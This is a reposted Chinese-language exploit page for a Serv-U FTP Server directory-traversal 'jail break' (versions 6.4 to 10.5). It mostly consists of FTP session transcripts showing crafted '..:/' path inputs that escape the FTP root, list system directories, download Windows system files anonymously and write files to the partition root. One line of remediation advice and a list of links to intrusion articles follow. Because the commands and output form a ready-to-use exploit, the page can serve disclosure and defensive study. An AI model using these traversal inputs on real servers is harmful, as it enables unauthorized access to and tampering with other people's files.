Serv-U FTP Jail Break(越权遍历目录、下载任意文件)

转载   佚名   2012-01-15   浏览量:591


本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

复制代码
代码如下:

[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]
/*
sebug.net
通过构造..:/来遍历服务器目录,下载任意文件
影响版本:6.4,7.1,7.3,8.2,10.5
*/
Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...
[*]----------------------------------------------------[*]
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r-- 1 user group 0 Nov 12 21:48 .
dr--r--r-- 1 user group 0 Nov 12 21:48 ..
drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio
n
drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
d--------- 1 user group 0 Jul 8 16:12 InstallShield
Installation Information
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch
drw-rw-rw- 1 user group 0 Feb 12 2011 Java
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw- 1 user group 0 Feb 12 2011 Sun
d--------- 1 user group 0 Jul 29 15:13 Uninstall Information
drw-rw-rw- 1 user group 0 Feb 5 2011 VMware
drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT
d--------- 1 user group 0 Feb 5 2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
[*]----------------------------------------------------[*]
with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
[*]----------------------------------------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]
This works to!!! :
220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s
[*]----------------------------------------------------[*]
Sometimes you need to give it the path:
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>

@Sebug.net [ 2011-12-01 ]
脚本提供修正方法:通过设置serv_u的权限可以防范此类问题,大家一定要注意serv_u安全设置问题。

转载自://www.jb51.net/hack/41307.html

招聘 不方便扫码就复制添加关注:程序员招聘谷,微信号:jobs1024



Serv-U FTP Jail Break(越权遍历目录、下载任意文件)
Serv-U 越权遍历目录、下载任意文件,通过构造..:/来遍历服务器目录,下载任意文件
饶过Xplog70.dll玩入侵(参考防范)
深夜了,好友“如影随行”突然发来消息,说他一台配置非常好的3389肉鸡飞了。以前他是从WEB页面注入入手,然后直接用Xp_cmdshell添加系统用户搞定的,可晚上用3389登陆时突然发现添加的用户不在了,安装的后门都被清理干净,连Xp_cmdshell也执行不了。
SC.exe在渗透中的妙用
sc为微软自带的一个服务管理工具,不过我们一般却很少用到,这里我们只提取出几个特殊的用法,以便我们在做Web安全测试中获取所需信息。
饶过Xplog70.dll玩入侵 参考防范
深夜了,好友“如影随行”突然发来消息,说他一台配置非常好的3389肉鸡飞了。以前他是从WEB页面注入入手,然后直接用Xp_cmdshell添加系统用户搞定的,可晚上用3389登陆时突然发现添加的用户不在了,安装的后门都被清理干净,连Xp_cmdshell也执行不了。
dedecms v5.1/5.5 两处跨站漏洞的修复办法
dedecms两处跨站漏洞的修复办法,大家可以防范下,以防被黑客利用。
巧用Cacls.exe命令来修改文件访问控制权限
建议大家亲自尝试一下,你会发现它还有很多奇妙的功能。
渗透服务器 绕过防注入文件
这些天给市府组织部修改一套网上视频系统,时间仓促在安全性方面也没有多少考虑。礼拜天闲来无事就总结一些HACK常用的注入手段
非主流入侵之会话劫持winnt/2k HASH
声明:本文只是在技术上分析如何来通过sniffer来劫持winnt/2k的hash,对此文可能造成的危害不负任何责任。引言:近来SMB会话劫持的讨论占据了个大技术论坛不少的位置,吸引了不少人的目光,同时绿盟月刊37期、Phrack杂志60期和安全焦点峰会也刊登出了相
另类巧妙的思路:旁门左道的入侵
很多的时候,入侵并不是单纯靠技术的,有很多是运气因素,更重要的是如何对一些摆在你面前的一些安全破绽的攻击。我很相信安全意识这个东西,当一台服务器摆在你面前时,大概的看下就知道服务器的安全到底如何了,特别是对于入侵之后的webshell的提升,更多的依赖于管理员
黑客实战:一次简单脚本攻击实例
一、开篇今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。二、准备/分析安全第一,先开个HTTP代理,打开社区的登陆页面,